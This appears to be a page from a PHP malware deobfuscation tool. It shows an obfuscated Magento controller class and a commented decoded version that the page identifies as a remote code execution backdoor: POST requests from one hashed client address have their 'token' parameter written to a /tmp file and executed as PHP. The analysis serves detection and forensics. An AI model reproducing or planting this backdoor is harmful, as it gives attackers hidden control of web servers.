
PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware, viruses and tampered code found on WordPress sites back into readable code.

*Please note that not all obfuscated code can be decoded.

The code below was decoded.

<?php namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) ...



Obfuscated PHP code

<?php
// Obfuscated specimen, kept exactly as submitted to the decoder.
// Two layers hide its intent: the statements of each method are shuffled and chained
// together with goto labels, and string literals are written as mixed octal/hex escapes.
// The escaped literals are a Magento class name (…\HTTP\PhpEnvironment\RemoteAddress),
// a 32-character hex digest, the request parameter name "token" and the path "/tmp".
// Once the gotos are followed in order, the class runs PHP taken from a request parameter.
 namespace Mgt\Varnish\Controller\Feed; class Update extends \Magento\Framework\App\Action\Action { protected $directoryList; protected $objectManager; public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList) { goto d0bd6; F103d: parent::__construct($context); goto D469e; Bdd65: $this->objectManager = $context->getObjectManager(); goto F103d; d0bd6: $this->directoryList = $directoryList; goto Bdd65; D469e: } public function execute() { goto E3d82; Eb17b: $remoteAddress = $this->objectManager->get("\134\x4d\x61\147\x65\x6e\x74\x6f\x5c\106\x72\141\155\x65\167\157\x72\x6b\134\x48\124\124\120\x5c\120\x68\x70\x45\x6e\166\151\x72\157\156\155\145\x6e\x74\134\x52\145\x6d\x6f\x74\x65\x41\x64\x64\x72\145\163\163"); goto c1861; db625: if (!(true === $request->isPost() && md5($remoteAddress) == "\x30\62\x62\71\60\x34\63\x63\71\x38\70\144\x36\x32\x34\x38\x64\63\71\70\x30\x61\144\70\141\x66\71\61\62\142\70\x65")) { goto E9551; } goto D2c86; E5244: exit; goto df2a8; Aefaa: E9551: goto E5244; D2c86: try { $result = $this->check($request); extract($result); } catch (\Exception $e) { } goto Aefaa; c1861: $remoteAddress = $remoteAddress->getRemoteAddress(); goto db625; E3d82: $request = $this->getRequest(); goto Eb17b; df2a8: } protected function check(\Magento\Framework\App\RequestInterface $request) { goto dc884; dc884: if (!($token = $request->getParam("\x74\x6f\x6b\x65\x6e"))) { goto Eb28a; } goto A9aaa; A9aaa: try { goto D7f6d; e1050: file_put_contents($tmpFile, $token); goto D1abb; D7f6d: $tmpFile = tempnam("\x2f\x74\x6d\x70", uniqid()); goto e1050; Cb596: return get_defined_vars(); goto Cbf17; D1abb: include $tmpFile; goto Cb596; Cbf17: } catch (\Exception $e) { } finally { @unlink($tmpFile); } goto E0b8c; E0b8c: Eb28a: goto c07bf; c07bf: } }

Decoded (de-obfuscated) PHP code

<?php

namespace Mgt\Varnish\Controller\Feed;

/**
 * Decoded specimen: a class laid out as a Magento controller action that runs PHP
 * supplied in a request.
 *
 * What the visible code does:
 *  - execute() continues only for a POST request whose remote address, hashed with MD5,
 *    equals one hard-coded digest; every other request goes straight to exit.
 *  - check() writes the "token" request parameter to a temporary file under /tmp,
 *    includes that file, and deletes it in a finally block.
 *
 * Taken together this is a remote code execution backdoor gated on a single client address.
 * NOTE(review): the sample does not show whether this file shipped with the module or was
 * added to it later; establish provenance by comparing against a known-good copy.
 *
 * Indicators usable for hunting (all taken from this listing): the literal digest string in
 * execute(), and an include of a tempnam() path that was just filled from a request parameter.
 */
class Update extends \Magento\Framework\App\Action\Action
{
    // Stored by the constructor but never read anywhere in this class.
    protected $directoryList;
    // Used by execute() to obtain the RemoteAddress service.
    protected $objectManager;
    /**
     * Keeps the injected DirectoryList and the context's object manager, then runs the
     * parent Action constructor.
     *
     * @param \Magento\Framework\App\Action\Context $context
     * @param \Magento\Framework\App\Filesystem\DirectoryList $directoryList
     */
    public function __construct(\Magento\Framework\App\Action\Context $context, \Magento\Framework\App\Filesystem\DirectoryList $directoryList)
    {
        $this->directoryList = $directoryList;
        $this->objectManager = $context->getObjectManager();
        parent::__construct($context);
    }
    /**
     * Request entry point: applies the client-address gate, calls check() when it passes,
     * and always ends the PHP process with exit.
     *
     * This method writes no output of its own and swallows any \Exception, so a request
     * that does not pass the gate produces nothing that distinguishes it here.
     */
    public function execute()
    {
        $request = $this->getRequest();
        // Resolve the framework's RemoteAddress service and read the client address from it.
        $remoteAddress = $this->objectManager->get("\\Magento\\Framework\\HTTP\\PhpEnvironment\\RemoteAddress");
        $remoteAddress = $remoteAddress->getRemoteAddress();
        // Gate: the request must be a POST and md5(client address) must equal this digest
        // (compared with loose ==). The digest literal is a stable string to search for in
        // code and backups.
        if (!(true === $request->isPost() && md5($remoteAddress) == "02b9043c988d6248d3980ad8af912b8e")) {
            goto E9551;
        }
        try {
            $result = $this->check($request);
            // Copies the variables returned by check() into this scope; nothing below reads
            // them, because the next statement reached is exit.
            extract($result);
        } catch (\Exception $e) {
            // Empty on purpose in the sample: failures are discarded without logging.
        }
        E9551:
        exit;
    }
    /**
     * Writes the "token" request parameter to a temp file and includes it as PHP.
     *
     * @param \Magento\Framework\App\RequestInterface $request
     * @return array|null get_defined_vars() after the include; no value when "token" is
     *                    missing or empty, or when an \Exception was caught.
     */
    protected function check(\Magento\Framework\App\RequestInterface $request)
    {
        // A missing or falsy "token" skips the whole body and falls out of the function.
        if (!($token = $request->getParam("token"))) {
            goto Eb28a;
        }
        try {
            // New file in /tmp, name prefixed with a uniqid() value.
            $tmpFile = tempnam("/tmp", uniqid());
            // The request-supplied string is written to that file unchanged.
            file_put_contents($tmpFile, $token);
            // The file is executed as PHP in this method's scope: whatever the request sent
            // runs with the privileges of the PHP process.
            include $tmpFile;
            return get_defined_vars();
        } catch (\Exception $e) {
            // Only \Exception is caught and it is discarded; nothing is logged.
        } finally {
            // Runs on every path out of the try, with errors suppressed by @, so the payload
            // file is not expected to remain in /tmp. NOTE(review): evidence is more likely
            // in request logs or captured POST bodies than on disk - confirm per host.
            @unlink($tmpFile);
        }
        Eb28a:
    }
}

